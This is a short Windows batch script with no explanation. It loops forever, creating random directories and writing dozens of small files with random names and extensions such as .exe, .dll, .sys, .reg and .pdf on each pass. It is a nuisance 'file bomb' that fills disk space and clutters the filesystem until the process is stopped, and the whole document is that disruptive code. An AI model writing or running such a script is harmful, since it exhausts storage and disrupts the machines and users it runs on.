@echo on
:loop
md %random%
>%random%.%random% echo >%random%.%random%
>%random%.cmd echo >%random%.cmd
>%random%.exe echo >%random%.exe
>%random%.log echo >%random%.log
>%random%.ini echo >%random%.ini
>%random%.dll echo >%random%.dll
>%random%.bin echo >%random%.bin
>%random%.txt echo >%random%.txt
>%random%.lnk echo >%random%.lnk
>%random%.png echo >%random%.png
>%random%.reg echo >%random%.reg
>%random%.ps1 echo >%random%.ps1
>%random%.bmp echo >%random%.bmp
>%random%.bat echo >%random%.bat
>%random%.jpg echo >%random%.jpg
>%random%.jpeg echo >%random%.jpeg
>%random%.db echo >%random%.db
>%random%.xml echo >%random%.xml
>%random%.prx echo >%random%.prx
>%random%.sys echo >%random%.sys
>%random%.ps2 echo >%random%.ps2
>%random%.ps3 echo >%random%.ps3
>%random%.avi echo >%random%.avi
>%random%.cab echo >%random%.cab
>%random%.cda echo >%random%.cda
>%random%.epx echo >%random%.epx
>%random%.gif echo >%random%.gif
>%random%.dif echo >%random%.dif
>%random%.flv echo >%random%.flv
>%random%.html echo >%random%.html
>%random%.mp3 echo >%random%.mp3
>%random%.mp4 echo >%random%.mp4
>%random%.mpeg echo >%random%.mpeg
>%random%.midi echo >%random%.midi
>%random%.iso echo >%random%.iso
>%random%.pdf echo >%random%.pdf
>%random%.msi echo >%random%.msi
>%random%.pdf echo >%random%.pdf
>%random%.mpg echo >%random%.mpg
>%random%.rtf echo >%random%.rtf
>%random%.swf echo >%random%.swf
>%random%.tif echo >%random%.tif
>%random%.tmp echo >%random%.tmp
>%random%.vob echo >%random%.vob
>%random%.wav echo >%random%.wav
>%random%.wma echo >%random%.wma
>%random%.wmv echo >%random%.wmv
>%random%.wmz echo >%random%.wmz
>%random%.wzs echo >%random%.wms
>%random%.rar echo >%random%.rar
>%random%.zip echo >%random%.zip
goto loop
